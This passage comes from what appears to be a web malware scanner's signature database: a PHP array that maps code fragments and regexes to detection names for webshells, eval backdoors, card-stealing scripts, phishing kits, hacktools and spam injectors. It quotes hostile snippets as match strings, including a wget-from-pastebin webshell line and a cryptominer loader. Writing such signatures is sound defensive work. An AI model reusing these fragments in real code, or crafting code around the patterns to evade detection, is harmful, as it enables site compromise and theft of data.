	'data: \'ip=localhost&login=\' + encodeURIComponent(login.val()) + \'&password=\' + encodeURIComponent(password.val()) + \'&url=' => array(STR_CLEARFILE, 'php.malware.login-stealer.006', 'jQuery\([^\)]+#login-form[^\)]*\)\.submit\(function\(.\)[\s]*\{[^#;]*var login[\s]*=[\s]*jQuery[^;]+\);[^#;]*[\s]*var pass[^\}]+async:[\s]*false[\s\)\};\\\\rn]+'),
),

'DDOS' => array(STR_TRIGGER,
	'DDoS-PHP' => array(STR_CLEARFILE, 'php.hacktool.ddos.008', NULL),
	'PHP DDoS' => array(STR_CLEARFILE, 'php.hacktool.ddos.001', NULL),
	'$_GET[\'method\'])) exit("target,' => array(STR_CLEARFILE, 'php.hacktool.ddos.002', NULL),
	'AnonGhost PHP DDOS' => array(STR_CLEARFILE, 'php.hacktool.ddos.003.001', NULL),
	'<input type="submit" value="    Launch DDOS Attack    ">' => array(STR_CLEARFILE, 'php.hacktool.ddos.003.002', NULL),
	'print "Flooded: $ip on port $rand <br><br>";' => array(STR_CLEARFILE, 'php.hacktool.ddos.003.003', NULL),
	'<title>Garuda DDOS ' => array(STR_CLEARFILE, 'js.hacktool.ddos.001', NULL),
),

'foreach' => array(STR_TRIGGER,

	'.=' => array(STR_TRIGGER,
		'();' => array(STR_TRIGGER,
			'\.[\'"]c[\'"]\.' => array(REX_TRIGGER,
				'\.[\'"]f[\'"]\.' => array(REX_TRIGGER,
		
					'\.[\'"]t[\'"]\.' => array(REX_CHAIN_TRIGGER,
		
						'\^[\s]*\$' => array(REX_TRIGGER,
							'<[\s]*strlen\(\$' => array(REX_CLEAR_LINEMATCH, 'php.backdoor.eval_REQUEST.025.05', 'function[\s]+[\w]+\(\$[\w]+,[\s]*\$[\w]+[\s]*=[^\)]+\)[\s]*\{[\s]*\$[\w]+[\s]*=[\s]*\$[\w]+;[\s]*\$[\w]+[\s]*=[^;]+;[\s]*for[\s]*\([^\n]+\}[\s]*return[\s]*\$[\w]+;[\s]*\}([\s]*\/\*[^\*]+\*\/)?'),
						),
		
						'foreach\(\[([\d]+,[\s]*){3}[^\]]+\] as \$[\w]+\)[\s]*\{[\s]*\$[\w]+[\s]*\.=[\s]*\$[\w]+\[\$[\w]+\];[\s]*\}[\s]*[^\$]+\$[\w]+[\s]*=[\s]*\$[\w]+\([^\)]+([\'"].{0,1}[\'"][\s]*\.){10,}' => array(REX_CLEAR_MULTIMATCH, 'php.backdoor.eval_REQUEST.025.04', '\$[\w]+[\s]*=[\s]*"[^"]{10,}";[^{]+foreach\(\[[\d]+,[\s]*[\d]+[^\{]+\{[\s]*\$[\w]+[\s]*\.=[\s]*\$[\w]+\[\$[\w]\];[\s]*\}[^}]+foreach\(\[[\d]+[^}]+\}[^\>]+\$[\w]+[\s]*=[\s]*\$[\w]+\([\'"][^;]+\);[\s]*\$[\w]+\(\);[\s]*(exit[^;]*;[\s]*)?(\}[\s]*)?'),
					),
				),
		
				'foreach\((array\(|\[)[\d]+,[\s]*[\d]+,[^\)]+(\)|\]) as \$[\w]+\)[\s]*\{[\s]*\$[\w]+[\s]*\.=[\s]*\$[\w]+\[\$[\w]+\];[\s]*\}[\s]*\$[\w]+[\s]*=[\s]*\$[\w]+\([\'\._noitcufear]{80}' => array(REX_CLEARFILE, 'php.backdoor.filesman.093', NULL),
			),
		),
	),

	']=implode("",array_reverse($' => array(STR_TRIGGER,

		'<?php @\'$' => array(STR_TRIGGER,
			';@eval($_REQUEST[$' => array(STR_CLEARFILE, 'php.backdoor.eval_REQUEST.057', NULL),
		),

		',PREG_SPLIT_NO_EMPTY);foreach($c as $d=>$e){$c[$d]=${' => array(STR_CLEAR_LINEMATCH, 'php.malware.obfuscated.033', '\$[\w]+="[^"]+";[\s]*\$[\w]+=explode\([^;]+\);[\s]*foreach[^\}]+implode\("",array_reverse\(\$[^\n]+@\$\{"[^"]+"\}\[[^;]+\);[\s]*(\/\*[^\n]+\*\/)?'),
	),

	'function check_bot_ip($ip) {' => array(STR_CLEARFILE, 'php.spam-seo.injector.044.02', NULL),
),

'charAt' => array(STR_TRIGGER,

	'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=' => array(STR_TRIGGER,

		'},\'removeCookie\':function(){return\'dev\';},\'getCookie\':function(' => array(STR_CHAIN_TRIGGER,
			'setCookie\':function(' => array(STR_CLEAR_LINEMATCH, 'js.malware.obfuscated.001', 'var [^=]+=[\s]*\[[^\]]{50,}\];[\s]*\(function[^<]+setCookie.:function[^\n]+(continue;\}break;\}\}|function\(\)[\s]*\{[\s]*alert\(\)\};)'),
			'>[\s]*var [\w]+[\s]*=[\s]*[\d]+;[\s]*<.script' => array(REX_CLEAR_LINEMATCH, 'js.malware.obfuscated.001.02', '<script[^>]+>[\s]*var [\w]+[\s]*=[\s]*[\d]+;[\s]*<.script>'),
		),

		'var[\s]*[\w]+[\s]*=[\s]*\[[\'"][\w=\/]+[\'"],([\s]*[\'"][\w=\/]+[\'"],){5}[^;]+==[^;]+;[^\n]+;(?=\/\*)' => array(REX_CLEAR_LINEMATCH, 'js.malware.obfuscated.002', 'var[\s]*[\w]+[\s]*=[\s]*\[[\'"][\w=\/]+[\'"],([\s]*[\'"][\w=\/]+[\'"],){5}[^;]+==[^;]+;[^\n]+;(?=\/\*)'),
		'{return t.replace(/[0-9A-Z]/g,"")}"undefined"!=typeof exports' => array(STR_CLEAR_LINEMATCH, 'js.malware.magento-cc-stealer.054', '!function\(\)\{[\s]*var .,.=function[^\}]+\},.=\{base64:.ABCD[^\n]+var \$=atob\([^\)]+\)\.replace\([^\}]+\$\)\}\(\);'),
	),

	';var r=t.length;var f=[];for(var j=0;j<r;j++){f[j]=t.charAt(j)};for(var j=0;j<r;j++){var b=o*(j+' => array(STR_CLEAR_LINEMATCH, 'js.malware.magento-cc-stealer.037', 'var j;\(function\(\)\{var [\w]+=Function;function [\w]+\(t\)\{var o=[\d]+;var r=t.length;var f=\[\];[^~]+\)[\s]*\)[\s]*\)[\s]*\)[\s]*\(\)[\s]*\}[\s]*\)[\s]*\(\)'),
	'=i().fromCharCode(127)' => array(STR_CLEAR_MULTIMATCH, 'js.malware.magento-cc-stealer.050', '\(function\(\)[\s]*\{[\s]*function [\w]+\(a,b\)[\s]*\{[\s]*return[\s]*a[\s]*==[\s]*b[\s]*\}[\s]*function[\s]*[\w]\(\)[\s]*\{[\s]*return[\s]*document[\s]*\}[^\?]+\?[\w]\[[\d]+\]:[\w]\[[\d]+\]\),[\s]*[\w]\[[\d]+\][\}\)\s]+\(\);'),
),

'User-Agent' => array(STR_TRIGGER,

	'aQ0O010O' => array(STR_TRIGGER,
		'\'header\'=>"User-Agent: aQ0O010O"' => array(STR_CLEARFILE, 'php.spam-seo.aQ0O010O.001', NULL),
		'"User-Agent","aQ0O010O"' => array(STR_CLEARFILE, 'asp.spam-seo.aQ0O010O.001', NULL),
		'"User-Agent", "aQ0O010O"' => array(STR_CLEARFILE, 'asp.spam-seo.aQ0O010O.002', NULL),
	),

	'$ser = str_replace("_", "", $likeid);' => array(STR_CLEARFILE, 'php.hacktool.fb_hack.002', NULL),
	'$pathOnMyHost,$_SERVER[\'HTTP_HOST\'].$pathToDor,$html);' => array(STR_CLEARFILE, 'php.spam-seo.doorway_downloader.017.02', NULL),
	'$insertafter = $html->find($CONFIG[\'insertafter\']);' => array(STR_CLEARFILE, 'php.spam-seo.doorway-gen.052', NULL),
),

'response.write' => array(STR_TRIGGER,

	'dim password,action,filename,filepath,body' => array(STR_TRIGGER,
		'response.write("uploaded")' => array(STR_CLEARFILE, 'asp.backdoor.uploader.007', NULL),
	),

	'Remote_file = Remote_server' => array(STR_TRIGGER,
		'GetHtml(Remote_file)' => array(STR_CLEARFILE, 'asp.spam-seo.generic.002', NULL),
	),

	'response.clear:response.charset' => array(STR_TRIGGER,
		'.GetSpecialFolder(' => array(STR_CLEARFILE, 'asp.spam-seo.injector.015', NULL),
	),

	'response.write GetResStr("http://' => array(STR_CLEARFILE, 'asp.spam-seo.injector.008', NULL),
	'response.write htmls' => array(STR_CLEARFILE, 'asp.spam-seo.redirect.001', NULL),
	'Content_mb=GetHtml(Remote_server&"/index.asp"&' => array(STR_CLEARFILE, 'asp.spam-seo.doorway.002', NULL),
),

'page' => array(STR_TRIGGER,

	'top.location = page;' => array(STR_TRIGGER,
		'$randomString = substr(str_shuffle("0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ"), 0, $length);' => array(STR_CLEARFILE, 'php.phishing.generic.040', NULL),
	),

	'function randomCha($len)' => array(STR_TRIGGER,
		'$allowed_countries=array(' => array(STR_CLEARFILE, 'php.phishing.script.004', NULL),
	),

	'$page = do_rand_vario($page); # [[|]]' => array(STR_CLEARFILE, 'php.spam-seo.injector.052', NULL),
	'.html">\'.strtolower(trim($keyitems[$keyarr[$i]])).\'</a></strong>' => array(STR_CLEAR_MULTIMATCH, 'php.spam-seo.injector.065', 'function Getfrom\\(\\)\\{[\\s]*\\$page_from=strtolower..._SERVER..HTTP_REFERER...;[^}]+}[^}]+}[\\s]*if.Getfrom...[\\s]*\\{[\\s]*header..Location:.*\\$content = InsertKeys..content,.keyarr,.keyitems,.prokeys,.script_url.;[\\s]*}'),
	'$pgs[]=\'<a href="\'.$page[1].\'">\'.$key[1].\'</a>\';' => array(STR_CLEARFILE, 'php.spam-seo.injector.110', NULL),
	'You see this page because one of your friends <br> have invited you.<br>' => array(STR_CLEARFILE, 'html.spam-seo.redirect.002', NULL),
),

'Brute' => array(STR_TRIGGER,

	'print "User:",users,"Password:",words' => array(STR_TRIGGER,
		'= open( \'pwned.log\', \'a\' )' => array(STR_CLEARFILE, 'py.hacktool.password_retriever.002', NULL),
	),

	'////Twitter Brute Force By Mauritania Attacker//////' => array(STR_CLEARFILE, 'php.hacktool.twitterbruteforce.001', NULL),
	'Joomla Brute Forcer' => array(STR_CLEARFILE, 'php.hacktool.joomla_bruteforce.001', NULL),
	'Pisher Plugin Upload Shell' => array(STR_CLEARFILE, 'php.phishing.generic.034.02', NULL),
	'FBF - FTP Brute Forcer' => array(STR_CLEARFILE, 'pl.hacktool.bruteforce.001', NULL),
	'echo "\nBrute Force' => array(STR_CLEARFILE, 'php.hacktool.bruteforce.002', NULL),
),

'Mailer' => array(STR_TRIGGER,

	'base64_decode' => array(STR_TRIGGER,
		'$fromadr = base64_decode($_POST[\'fromadr\']);' => array(STR_CLEARFILE, 'php.hacktool.mailer.039', NULL),
	),

	'>PHP Mailer By' => array(STR_CLEARFILE, 'php.hacktool.mailer.006', NULL),
	' Mailer By Sp4m3r Fb' => array(STR_CLEARFILE, 'php.hacktool.mailer-Sp4m3r-Fb3.001', NULL),
	'if ($_POST["enviar"]){' => array(STR_CLEARFILE, 'php.hacktool.mailer.031', NULL),
	'<span class="style1">Welcome to Inbox Mailer?<br>' => array(STR_CLEARFILE, 'php.hacktool.inbox-mailer.001', NULL),
	'leafmailer' => array(STR_CLEARFILE, 'php.hacktool.spamtool.002.03', NULL),
),

')));\');' => array(STR_TRIGGER,

	'$GLOBALS[' => array(STR_TRIGGER,
		'("?>"' => array(STR_TRIGGER,
			'\$GLOBALS\[\'[\w]+\'\][\s]*=[\s]*.[\w]{20,}.;[^\$]*\$func[\s]*=[^\(]+\(.\$x' => array(REX_CLEARFILE, 'php.backdoor.create_function.027', NULL),
		),
	),

	'$wp_add_filter = $erz(\'$v\', \'e\'.\'va\'.\'l' => array(STR_CLEARFILE, 'php.spam-seo.injector.075', NULL),
	'\$\w+\s*=\s*[\'"\.create_function\\\x63\\\x72e\\\x61\\\x74e\\\x5F\\\x66\\\x75\\\x6E\\\x63\\\x74\\\x69\\\x6F\\\x6E]+\s*;\s*\$(\w+)\s*=\s*\@\$\w+\([\'"]\$\w+[\'"]\s*,\s*[\'"\.\(\?\>eval gzinflate base64_decode\\\x67\\\x7A\\\x6E\\\x66\\\x6C\\\x61\\\x74e\\\x62\\\x61\\\x73e\\\x5F\\\x64e\\\x63\\\x6F\\\x64]+\(\$' => array(REX_CLEAR_LINEMATCH, 'php.malware.cryptominer.002.02', '\$\w+\s*=\s*[\'"\.create_function\\\x63\\\x72e\\\x61\\\x74e\\\x5F\\\x66\\\x75\\\x6E\\\x63\\\x74\\\x69\\\x6F\\\x6E]+\s*;\s*\$(\w+)\s*=\s*\@\$\w+\([\'"]\$\w+[\'"]\s*,\s*[\'"\.\(\?\>eval gzinflate base64_decode\\\x67\\\x7A\\\x6E\\\x66\\\x6C\\\x61\\\x74e\\\x62\\\x61\\\x73e\\\x5F\\\x64e\\\x63\\\x6F\\\x64]+\(\$\w+\)\)\);\s*[\'"]\)\s*;\s*\@\$\1\(["\'][^;]+;'),
	'(\$[\w]+)[\s]*=[\s]*[\'"][\'"creat_funio\.\/\*]{16,};[\s]*(\$[\w]+)[\s]*=[\s]*\1\(.\1.,([^\.;]+\.){15}[^\$]+\);[\s]*\2\([^\)]*\);' => array(REX_CLEAR_MULTIMATCH, 'php.malware.eval_gen.006', '(\$[\w]+)[\s]*=[\s]*[\'"][\'"creat_funio\.\/\*]{16,};[\s]*(\$[\w]+)[\s]*=[\s]*\1\(.\1.,([^\.;]+\.){15}[^\$]+\);[\s]*\2\([^\)]*\);'),
	'dZBfT8IwFMWf2afoA0kHMfwZMCBIhOBieBkyMJoY0nTbZa3p2qUtJkT97m7zQTT6dvM795ze0+ubghXO' => array(STR_CLEARFILE, 'php.backdoor.eval_REQUEST.058', NULL),
),

'alert(' => array(STR_TRIGGER,
	'JavaScript">alert(" Yayank Riri' => array(STR_CLEARFILE,'js.defaced.script.001', NULL),
	'alert("Indonesian people in here");' => array(STR_CLEARFILE, 'js.defaced.script.003', NULL),
	'alert(\'Access Denied! Protected By Cyb3r Sw0rd!\')' => array(STR_CLEARFILE, 'html.defaced.Cyb3rSw0rd.001', NULL),
	'alert("                ..:: HaCkeD By Mr-Ahmed' => array(STR_CLEARFILE, 'html.defaced.Mr-Ahmed.001', NULL),
	'alert("To complete the update, please enter your Email Password."); form.emailpassword.' => array(STR_CLEARFILE, 'html.phishing.email_account.002', NULL),
),

'Chr' => array(STR_TRIGGER,
	'Server.CreateObject ( Chr ( 97 ) & Chr ( 100 ) & Chr ( 111 ) & Chr ( 100 ) & Chr ( 98 ) & Chr ( 46 ) & Chr ( 115 ) & Chr ( 116 ) & Chr ( 114 )' => array(STR_CLEARFILE, 'asp.spam-seo.injector.005', NULL),
	'= Chr ( 104 ) & Chr ( 116 ) & Chr ( 116 ) & Chr ( 112 ) & Chr ( 58 ) & Chr ( 47 ) & Chr ( 47 ) & Chr' => array(STR_CLEARFILE, 'asp.spam-seo.injector.007', NULL),
	', Chr(37) & ChrW(-243) & Chr(62), Chr(37) & Chr(62))' => array(STR_CLEARFILE, 'asp.spam-seo.injector.009', NULL),
	'dim god, faith, holy, pray, amen, Christz' => array(STR_CLEARFILE, 'asp.spam-seo.injector.012', NULL),
	'panjang%3Bi++%29%7B%20teks+%3DString.fromCharCode%28le_chaland.' => array(STR_CLEARFILE, 'js.phishing.generic.001', NULL),
),

'register_shutdown_function' => array(STR_TRIGGER,

	'}!==false&&preg_match("' => array(STR_TRIGGER,
		']});}}}@ob_start();@register_shutdown_function(' => array(STR_CLEAR_LINEMATCH, 'php.malware.injector.064', '(\$\{"[^;]+;)+if\(!@defined\([^\{]+\{@define[^\}]+\}\[[^@]+@ob_get_contents\(\);\$\{\$\{[^\n]+@register_shutdown_function\([^\}]+\}'),
	),

	'require_once(ABSPATH . \'wp-settings.php\');' => array(STR_TRIGGER,
		'preg_replace(\'#<script(.*)' => array(STR_CLEAR_MULTIMATCH, 'php.spam-seo.doorway-gen.117.02', 'function.\w+\(\$\w\)\{\s+\$\w+=strlen\([^5]*56\',\s+\$\w+\)\s+\!=\s+AUTHHASH\)\s+\{[^W]*WRITECLOHASH\'\][^M]*MOTE_ADDR\'\]\);[^U]*Us\',\s+\".title.\$\w+[^M]*M\.\"=\{[^d]*down_function\(\'\w+\'\);\s+ob_start\(\);'),
	),

	'@[\s]*register_shutdown_function[\s]*\([\s]*\$[{"\s]*_(COOKIE|POST)' => array(REX_CLEAR_MULTIMATCH, 'rex.backdoor.eval_post.002', '@[\s]*register_shutdown_function[\s]*\([\s]*\$[{"\s]*_(COOKIE|POST)[^;]+(COOKIE|POST)["\s}]*\{[^}]+\}[\s]*\)[\s]*;'),
	'preg_replace(\'#<script(.*)' => array(STR_CLEARFILE, 'php.spam-seo.doorway-gen.117', NULL),
),

'r57' => array(STR_TRIGGER,
	'$name=\'r57\';' => array(STR_CLEARFILE, 'php.backdoor.r57-shell.001.001', NULL),
	'$r57="7b17W9tIsjj8f54n3' => array(STR_CLEARFILE, 'php.backdoor.r57-shell.001.003', NULL),
	'with md5, default is \'r57\'' => array(STR_CLEARFILE, 'php.backdoor.r57-shell.001.004', NULL),
	'$exec=exec(\'wget http://pastebin' => array(STR_CLEARFILE, 'php.backdoor.webshell.147', NULL),
),

'c99' => array(STR_TRIGGER,
	'; c99shexit();' => array(STR_CLEARFILE, 'php.backdoor.c99-shell.001', NULL),
	'function c99shexit' => array(STR_CLEARFILE, 'php.backdoor.c99-shell.001.02', NULL),
	'c99sh_surl' => array(STR_CLEARFILE, 'php.backdoor.c99-shell.001.05', NULL),
	'c99shell' => array(STR_CLEARFILE, 'php.backdoor.generic-w3.017', NULL),
),

'GIF8' => array(STR_TRIGGER,
	'\AGIF[^\n]+\s*<.[Pp][Hh][Pp]' => array(REX_CLEARFILE, 'php.backdoor.fakeGIF.009', NULL),
	'<%-- ASPX Shell' => array(STR_CLEARFILE, 'asp.backdoor.webshell.002', NULL),
	'copy($_FILES' => array(STR_CLEARFILE, 'php.backdoor.uploader.001.04', NULL), 
	'&drive_.DriveLetter&' => array(STR_CLEARFILE, 'asp.backdoor.zehir.002', NULL),
),

'goto' => array(STR_TRIGGER,

	'; goto' => array(STR_TRIGGER,
		'<\?(php)?[\s]*(\/\*[^\$]+\*\/[\s]*)?goto [\w]+;[\s]*[\w]+:[^\n]+([\s]*\?>)?' => array(REX_CLEAR_MULTIMATCH, 'php.malware.obfuscated.028', '<\?(php)?[\s]*(\/\*[^\$]+\*\/[\s]*)?goto [\w]+;[\s]*[\w]+:[^\n]+([\s]*\?>)?'),
	),

	'\x27\x37\130\x31\x72\145\71\x72\x47\x45\x76\104\x6e\x6e\x4f' => array(STR_CLEARFILE,'php.malware.filesman.033', NULL),
	'\x6b\137\51\64\63\x70\166\x69\163\x6f\161\x68\x6d\x77\x79' => array(STR_CLEARFILE,'php.malware.filesman.035', NULL),
),

'netvigator.com' => array(STR_TRIGGER,
	'="gray75_11"><a href="https://profile.netvigator.com/netpass/servlet/NPMainServlet?action' => array(STR_CLEARFILE, 'html.phishing.netvigator.001', NULL),
	'<form id="frmLogin"action="\'+login_frm_path+\'"method="post"target="_top">' => array(STR_CLEARFILE, 'js.phishing.netvigator.001', NULL),
	'window.open(\'https://netpass.netvigator.com/netpass/servlet/NPMainServlet?action=np_logout&loadBean=yes&successurl=http://www.netvigator.com/&failurl=http://www.netvigator.com/\'' => array(STR_CLEARFILE, 'js.phishing.netvigator.002', NULL),
),

'priv8' => array(STR_TRIGGER,
	'CONTADOR v2.0 - DESENVOLDI POR' => array(STR_CLEARFILE, 'php.hacktool.phishbackend.001', NULL),
	'MullaKill Priv8' => array(STR_CLEARFILE, 'php.hacktool.phishbackend.001.001', NULL),
	'priv8 WebShell' => array(STR_CLEARFILE, 'php.hacktool.priv8shell.001', NULL),
),

'AddHandler' => array(STR_TRIGGER,
	'AddHandler cgi-script (\.evil|\.cin|\.jpg|\.png|\.mcc|\.alfa)' => array(REX_CLEAR_LINEMATCH,'rex.backdoor.cgi-enabler.001', 'AddHandler cgi-script (\.evil|\.cin|\.jpg|\.png|\.mcc|\.alfa)'),
	'DirectoryIndex Sux.html' => array(STR_CLEARFILE, 'htaccess.malware.generic.012', NULL),
	'Options\s*Indexes\s*FollowSymLinks\s*DirectoryIndex\s*\w+\.(?:html?|phtml|js|php|asp)\s*(?:AddType\s*txt\s*\.php\s*AddHandler\s*txt\s*\.php|AddType\s*txt\s*\.html?\s*AddHandler\s*txt\s*\.html?)\s*(?:AddType\s*txt\s*\.php\s*AddHandler\s*txt\s*\.php|AddType\s*txt\s*\.html?\s*AddHandler\s*txt\s*\.html?)?\s*Options\s*\w+\s*(?:Options\s*\w+)?\s*ReadmeName\s*\w+\.txt' => array(REX_CLEAR_MULTIMATCH, 'htaccess.malware.generic.013', 'Options\s*Indexes\s*FollowSymLinks\s*DirectoryIndex\s*\w+\.(?:html?|phtml|js|php|asp)\s*(?:AddType\s*txt\s*\.php\s*AddHandler\s*txt\s*\.php|AddType\s*txt\s*\.html?\s*AddHandler\s*txt\s*\.html?)\s*(?:AddType\s*txt\s*\.php\s*AddHandler\s*txt\s*\.php|AddType\s*txt\s*\.html?\s*AddHandler\s*txt\s*\.html?)?\s*Options\s*\w+\s*(?:Options\s*\w+)?\s*ReadmeName\s*\w+\.txt'),
),

'"^"' => array(STR_TRIGGER,
	'preg_replace("\\' => array(STR_CLEAR_LINEMATCH, 'php.backdoor.preg_replace_xor.002', 'preg_replace\(("\\\[^,"]+?"\^"\\\[^,"]+?",\s*){2}"\\\[^,"]+?"\^\"\\\[^,"]+?"\);'),
	'\$[\w]+=\'[preglac_\'\.\s]{15,};[\s]*\$[\w]+="[\w]+"\^"[^;]+\\\\x[\w]{2}[^;]+";[\s]*\$[\w]+\(' => array(REX_CLEAR_LINEMATCH, 'rex.backdoor.eval_REQUEST.027', '\$[\w]+=\'[preglac_\'\.\s]{15,};[\s]*\$[\w]+="[\w]+"\^"[^;]+\\\\x[\w]{2}[^;]+";[\s]*\$[\w]+\([^\)]+"[\s]*\^[\s]*"[^\)]+"[\w]+"\);'),
	'\$[\w]+[\s]*=[\s]*[\'"][preglac_\.\'"]+;[\s]*\$[\w]+[\s]*=[\s]*[\'"][\w\\\]+[\'"]\^[\'"]' => array(REX_CLEAR_MULTIMATCH, 'rex.obfuscated_pregreplace.001', '\$[\w]+[\s]*=[\s]*[\'"][preglac_\.\'"]+;[\s]*\$[\w]+[\s]*=[\s]*[\'"][\w\\\]+[\'"]\^[\'"][\w\\\]+[\'"];[\s]*\$[\w]+[^;]+;'),
),

'CGI' => array(STR_TRIGGER,
	'echo "<br>[CGI] => CHMOD To 755 Complate !";' => array(STR_CLEARFILE, 'php.backdoor.webshell_gen.067', NULL),
	'CGI-Telnet' => array(STR_CLEARFILE, 'pl.backdoor.cgitelnet-shell.001', NULL),
	'>Welcome to cgi-shell.py' => array(STR_CLEARFILE,'py.hacktool.webshell.002', NULL),
),

'(\'\',' => array(STR_TRIGGER,
	'(\$[\w]+[\s]*=[\s]*\'[^;]+\'[\s]*\.[\s]*\'[^;]+;[\s]*){3}\$[\w]+[\s]*=[\s]*@?\$[\w]+\(\'\',[\s]*\$[\w]+\(\$[\w]+\(\'[^\'\s]{1000}[^;]+;[\s]*\$[\w]+\(\);' => array(REX_CLEAR_LINEMATCH, 'php.backdoor.eval_POST.122', '(\$[\w]+[\s]*=[\s]*\'[^;]+\'[\s]*\.[\s]*\'[^;]+;[\s]*){3}\$[\w]+[\s]*=[\s]*@?\$[\w]+\(\'\',[\s]*\$[\w]+\(\$[\w]+\(\'[^\'\s]{1000}[^;]+;[\s]*\$[\w]+\(\);'),
	'QHNlc3Npb25fc3RhcnQoKTtpZihpc3Nld' => array(STR_CLEARFILE, 'php.backdoor.eval_POST.144', NULL),
	'\$\w+.=.\"\/\w+\([^=]*=.\w+\(\$\w+\[\d+\],.\$\w+\[\d+\],.\'\'\);[^\}]*\}\'.\..\$\w+.\..\'\/\/\'\)\);' => array(REX_CLEAR_MULTIMATCH, 'php.malware.injector.083', '\$\w+.=.\"\/\w+\([^=]*=.\w+\(\$\w+\[\d+\],.\$\w+\[\d+\],.\'\'\);[^\}]*\}\'.\..\$\w+.\..\'\/\/\'\)\);'),
),

'erver' => array(STR_TRIGGER,
	'<br><h3> Server Script Lister' => array(STR_CLEARFILE, 'php.backdoor.uploader_POST.003', NULL),
	'"/tmp/tmp-server"' => array(STR_CLEARFILE, 'php.backdoor.webshell_gen.024', NULL),
	'"fucksure")>0' => array(STR_CLEARFILE, 'vb.malware.generic.004', NULL),
),

'Document 40' => array(STR_TRIGGER,
	'40\d[\s]*http' => array(REX_TRIGGER,
		'		ErrorDocument 40' => array(STR_CLEAR_MULTIMATCH, 'htaccess.spam-seo.redirect_gen.034', '(\s{30}|\t{5})ErrorDocument [4-5]0[0-9] https?:\/\/\w+[^\r\n]+'),
		'404 http://toptanbayangiyim.com' => array(STR_CLEAR_LINEMATCH, 'htaccess.spam-seo.redirect_gen.035', 'ErrorDocument\s+404\s+http:\/\/toptanbayangiyim\.com[^\s]*'),
	),
),

'Cielo' => array(STR_TRIGGER,
	'Cielo: Nada supera essa mÃ¡quina | Cielo.com' => array(STR_CLEARFILE, 'html.phishing.cielo.002', NULL), //ns
	'Cielo na Copa 2014 - Cadastre - se! 20 Mi' => array(STR_CLEARFILE, 'html.phishing.cielo.002.002', NULL), //ns
),

'submitHandler: function(form)' => array(STR_TRIGGER,
	'submitHandler:[\s]*function\(form\)[\s]*\{[\s]*\$\(.[\S]+\)\.show\(\);[\s]*\$.post\(.[^$]+\$\(..[\w]+.\).serialize\(\),[\s]*function\(result\)\{[^$]+\$\(location\).attr\(.href.,' => array(REX_CLEARFILE, 'js.phishing.generic.009', NULL),
	'$details->bank->name;' => array(STR_CLEARFILE, 'php.phishing.generic.083', NULL),
),

'reet' => array(STR_TRIGGER, 
	'PAKISTAN CYBER ATTACKER' => array(STR_CLEARFILE, 'php.defaced.generic.005', NULL),
	'Kamu Bajingan' => array(STR_CLEARFILE, 'html.defaced.generic.109', NULL),
),

'swf?myid' => array(STR_TRIGGER,
	'5.61.36.66/jobhO.swf' => array(STR_CLEAR_MULTIMATCH, 'php.malware.generic.049', '<object [^>]+?data="http:\/\/5.61.36.66\/jobhO\..+?<\/object>'),
	'.swf?myid=4jhg5asd' => array(STR_CLEAR_MULTIMATCH, 'js.spam-seo.injector.019', 'var ([\\w]+)[\\s]*=[\\s]*false;[\\s]*function ([\\w]+)\\(\\)\\{[\\s]*if[\\s]*\\([\\s]*\\1[\\s]*==[\\s]*false\\)\\{[\\s]*var frame =[^@]+\\2\\(\\)[\\s]*}[\\s]*.\\*@cc_on @..[\\s]*..@if \\(@_win32\\)[^@]+@end @..'),
),

'getScript(atob' => array(STR_TRIGGER,
	'$.getScript(atob("aHR0cDovL2pzLmNkbmxpYnMuY29tL2pxdWVyeS5saWJzLmpz"));' => array(STR_CLEAR_LINEMATCH, 'js.spam-seo.injector.027', '..getScript.atob."aHR0cDovL2pzLmNkbmxpYnMuY29tL2pxdWVyeS5saWJzLmpz"..;'),
	'$(document).ready(function() {$.getScript(atob("aHR0cH' => array(STR_CLEAR_LINEMATCH, 'js.malware.cryptominer.004', '<script[^>]+>\$\s*\(document\)\.ready\(function\(\)\s*{\$\.getScript\(atob\([^\)]+\),\s*function\(\)\s*{var\s*\w+\s*=\s*new\s*CoinHive\.Anonymous\([^\)]+\)\s*;\s*\w+\.start\(\)\s*;\s*\w+\.setThrottle\((\d+\.)?\d+\)\s*;}\);}\);<\/script>'),
),

'CK' => array(STR_TRIGGER,
	'^[\s]*HACKED' => array(REX_CLEARFILE, 'html.defaced.generic.150', NULL),
),

'php Error_Reporting(0);' => array(STR_TRIGGER,
	'php Error_Reporting(0); $' => array(STR_CLEAR_LINEMATCH,'php.malware.generic.037.02', 'Error_Reporting\(0\);[\s]*\$[\w]{8,}=[\'"][^\'"]{200,}[\'"];([^>]*return;)?'),
),

'importScripts' => array(STR_TRIGGER,
	'self\.importScripts\(.http' => array(REX_CLEAR_LINEMATCH, 'js.malware.injector.061', 'self\.importScripts\(.http[^\)]+\);'),
),

'FollowSymLinks' => array(STR_TRIGGER,
	'#Coded By Sole Sad' => array(STR_CLEARFILE, 'htaccess.hacktool.cgi.003', NULL),
),

'AddType application' => array(STR_TRIGGER,
	'AddType application.x-httpd-cgi (\.png|\.jpg|\.mcc|\.izri|\.evil|\.alfa|\.cin|\.ss)' => array(REX_CLEAR_LINEMATCH,'rex.backdoor.cgi-enabler.001.02', 'AddType application\/x-httpd-cgi (\.png|\.jpg|\.mcc|\.izri|\.evil|\.alfa|\.cin|\.ss)'),
),

// only pure name based sigs should be stored here; PG 12/2018

'wp-' => array(STR_PATH_TRIGGER, 

	// detectes htaccess files in wp-admin or wp-includes under images subfolder
	'(wp-admin|wp-includes)\/images\/\.htaccess' => array(REX_PATH_TRIGGER, 
	
		// avoids detecting hardening htaccess
		'<Files \*\.php>[\s]*deny from all[\s]*<.Files>' => array(REX_WHITE,
	
			// most generic detection while file is not empty - single space
			' ' => array(STR_CLEARFILE, 'filename.php_on_wp-core_images.002', NULL),
		),
	),
),

'<?' => array(STR_TRIGGER,

	'<?php' => array(STR_TRIGGER, 

		'includ' => array(STR_TRIGGER, 

			'(?<!\.|_)include(_once)?\s*\([\'"](?!\$)[^;\)]+(?<!php|htm|html|phtml|shtml|inc|tmpl|tpl|js|css|sct|pl|py|sh|cgi|cfm|asp|asa|htc)[\'"]\)\s*;' => array(REX_TRIGGER, 

				'Googlebot' => array(STR_TRIGGER, 
					'if \(strpos\(\$userAgent, \$spider\)' => array(REX_CLEAR_MULTIMATCH, 'rex.include_images.003', '<\?php\s*\$userAgent[^\{]+Googlebot[^\}]+include(_once)?\s*\(.[^;\)]+(gif|png|jpg|jpeg|ico).\)\s*;[^\}]+\}\s*\}'),
				),

